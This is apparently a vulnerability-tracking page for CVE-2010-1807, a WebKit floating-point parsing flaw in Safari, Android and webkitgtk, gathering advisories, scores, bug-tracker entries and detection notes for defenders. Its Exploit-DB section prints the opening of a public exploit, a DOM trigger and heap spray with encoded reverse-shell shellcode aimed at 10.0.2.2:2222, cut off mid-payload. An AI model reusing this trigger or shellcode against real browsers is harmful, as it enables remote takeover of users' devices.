CVE-2010-1807
published 2010-09-10CVE-2010-1807: WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2; Android before 2.2; and webkitgtk before 1.2.6; does not properly validate floating-point data…
PriorityP274critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
61.32%
99.0th percentile
WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2; Android before 2.2; and webkitgtk before 1.2.6; does not properly validate floating-point data, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to non-standard NaN representation.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| android | <= 2.1 | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| webkitgtk | webkitgtk | <= 1.2.5 | — |
| webkitgtk | webkitgtk | — | — |
| webkitgtk | webkitgtk | — | — |
| webkitgtk | webkitgtk | — | — |
| webkitgtk | webkitgtk | — | — |
| webkitgtk | webkitgtk | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\u33bc\u0057
bytes↗
\ua8c0\u0100
- →Trigger is a crafted NaN string passed to parseFloat — look for 'NAN(ffffe00572c60)' or similar non-standard NaN representations in HTML/JS content processed by WebKit. ↗
- →Exploit uses heap spray via large unescape() string buffers followed by DOM innerHTML assignment to trigger the use-after-free; monitor for large repeated unicode escape sequences in JavaScript combined with innerHTML writes. ↗
- →The vulnerability is triggered via a crafted HTML document containing non-standard NaN floating-point representation; WebKit's float parser mishandles it leading to use-after-free. ↗
- →Exploit appends a child span element to a known DOM element and sets innerHTML to the malicious float string — look for dynamic DOM manipulation patterns pairing appendChild with innerHTML assignment of float/NaN values. ↗
- ·The exploit in exploit-db/15548 hardcodes a connect-back IP and port (192.168.0.1 / port 12345) via unescape-encoded shellcode; real-world attacker payloads will substitute their own C2 IP and port in the shellcode bytes. ↗
- ·The original exploit (exploit-db/15423) is hardcoded to return a shell to 10.0.2.2 port 2222, which is the Android emulator host address; production attacks will use a different IP/port. ↗
- ·The vulnerability affects Android before 2.2; the exploit author notes 'some said it works on some devices with 2.2', so patched version alone may not be a reliable exclusion criterion. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qhcv-5g2q-vm4c: WebKit in Apple Safari 4
ghsa_unreviewed·2022-05-17
CVE-2010-1807 [HIGH] CWE-20 GHSA-qhcv-5g2q-vm4c: WebKit in Apple Safari 4
WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2; Android before 2.2; and webkitgtk before 1.2.6; does not properly validate floating-point data, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to non-standard NaN representation.
VulnCheck
Apple safari Improper Input Validation
vulncheck·2010·CVSS 9.3
CVE-2010-1807 [CRITICAL] Apple safari Improper Input Validation
Apple safari Improper Input Validation
WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2; Android before 2.2; and webkitgtk before 1.2.6; does not properly validate floating-point data, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to non-standard NaN representation.
Affected: Apple safari
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.talosintelligence.com/content/files/2023/12/2023_Talos_Year_In_Review.pdf
Red Hat
webkit: input validation error when parsing certain NaN values
vendor_redhat·2010-09-07·CVSS 9.3
CVE-2010-1807 [CRITICAL] CWE-20 webkit: input validation error when parsing certain NaN values
webkit: input validation error when parsing certain NaN values
WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2; Android before 2.2; and webkitgtk before 1.2.6; does not properly validate floating-point data, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to non-standard NaN representation.
No detection rules found.
Exploit-DB
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
exploitdb·2010-11-15·CVSS 9.3
CVE-2010-1807 [CRITICAL] Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
---
# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on
Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807
*Better exploit (better rate and more flexible for changes, also shorter
shellcode) than what you have, plus, it's also verified. Enjoy!
More details at : *
http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html*
//This code is only for security researches/teaching purposes,use at your own risk!
// bug = webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//patched= android 2.2, some said it works on some devices with 2.2.
//originally noticed/written by mj(good job man!)
Exploit-DB
Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)
exploitdb·2010-11-05·CVSS 9.3
CVE-2010-1807 [CRITICAL] Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)
Google Android 2.0
// bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
// listed as a safari bug but also works on android :)
//tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1
//patched= android 2.2
//author = mj
// hardcoded to return a shell to 10.0.2.2 port 2222
//
function sploit(pop)
{
var span = document.createElement("div");
document.getElementById("pwn").appendChild(span);
span.innerHTML = pop;
}
function heap()
{
var scode = unescape("\u3c84\u0057\u3c80\u0057\u3c7c\u0057\u3c78\u0057\u3c74\u0057\u3c70\u0057\u3c6c\u0057\u3c68\u0057\u3c64\u0057\u3c60\u0057\u3c5c\u0057\u3c58\u0057\u3c54\u0057\u3c50\u0057\u3c4c\u0057\u3c48\u0057\u3c44\u0057\u3c40\u0057\u3c3c\u0057\u3c38\u0057\u3c34\u0057\u3c30\u0057\u3c2c\u0057\u3c2
Bugzilla
CVE-2010-3113 CVE-2010-1814 CVE-2010-1812 CVE-2010-1815 CVE-2010-3115 CVE-2010-1807 CVE-2010-3114 CVE-2010-3116 CVE-2010-3257 CVE-2010-3259 webkitgtk various flaws [fedora-all]
bugzilla·2010-10-05·CVSS 9.3
CVE-2010-3113 [CRITICAL] CVE-2010-3113 CVE-2010-1814 CVE-2010-1812 CVE-2010-1815 CVE-2010-3115 CVE-2010-1807 CVE-2010-3114 CVE-2010-3116 CVE-2010-3257 CVE-2010-3259 webkitgtk various flaws [fedora-all]
CVE-2010-3113 CVE-2010-1814 CVE-2010-1812 CVE-2010-1815 CVE-2010-3115 CVE-2010-1807 CVE-2010-3114 CVE-2010-3116 CVE-2010-3257 CVE-2010-3259 webkitgtk various flaws [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://adm
Bugzilla
CVE-2010-1807 webkit: input validation error when parsing certain NaN values
bugzilla·2010-08-26·CVSS 9.3
CVE-2010-1807 [CRITICAL] CVE-2010-1807 webkit: input validation error when parsing certain NaN values
CVE-2010-1807 webkit: input validation error when parsing certain NaN values
An input validation issue exists in WebKit's handling of floating point data types. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of floating point values. Credit to Luke Wagner of Mozilla for reporting this issue.
References:
https://bugs.webkit.org/show_bug.cgi?id=43461
http://trac.webkit.org/changeset/64706
Discussion:
This is now public:
http://support.apple.com/kb/HT4333
---
This issue has been corrected in WebKitGTK 1.2.5.
---
Created webkitgtk tracking bugs for this issue
Affects: fedora-all [bug 640382]
---
This issue has been addressed in following products:
Red Hat Ent
http://lists.apple.com/archives/security-announce/2010//Nov/msg00003.htmlhttp://lists.apple.com/archives/security-announce/2010//Sep/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/41856http://secunia.com/advisories/42314http://secunia.com/advisories/43068http://secunia.com/advisories/43086http://support.apple.com/kb/HT4333http://support.apple.com/kb/HT4456http://trac.webkit.org/changeset/64706http://www.computerworld.com/s/article/9195058/Researcher_to_release_Web_based_Android_attackhttp://www.mandriva.com/security/advisories?name=MDVSA-2011:039http://www.redhat.com/support/errata/RHSA-2011-0177.htmlhttp://www.securityfocus.com/bid/43047http://www.ubuntu.com/usn/USN-1006-1http://www.vupen.com/english/advisories/2010/2722http://www.vupen.com/english/advisories/2010/3046http://www.vupen.com/english/advisories/2011/0212http://www.vupen.com/english/advisories/2011/0216http://www.vupen.com/english/advisories/2011/0552https://bugzilla.redhat.com/show_bug.cgi?id=627703https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11964http://lists.apple.com/archives/security-announce/2010//Nov/msg00003.htmlhttp://lists.apple.com/archives/security-announce/2010//Sep/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/41856http://secunia.com/advisories/42314http://secunia.com/advisories/43068http://secunia.com/advisories/43086http://support.apple.com/kb/HT4333http://support.apple.com/kb/HT4456http://trac.webkit.org/changeset/64706http://www.computerworld.com/s/article/9195058/Researcher_to_release_Web_based_Android_attackhttp://www.mandriva.com/security/advisories?name=MDVSA-2011:039http://www.redhat.com/support/errata/RHSA-2011-0177.htmlhttp://www.securityfocus.com/bid/43047http://www.ubuntu.com/usn/USN-1006-1http://www.vupen.com/english/advisories/2010/2722http://www.vupen.com/english/advisories/2010/3046http://www.vupen.com/english/advisories/2011/0212http://www.vupen.com/english/advisories/2011/0216http://www.vupen.com/english/advisories/2011/0552https://bugzilla.redhat.com/show_bug.cgi?id=627703https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11964
2010-09-10
Published
Exploited in the wild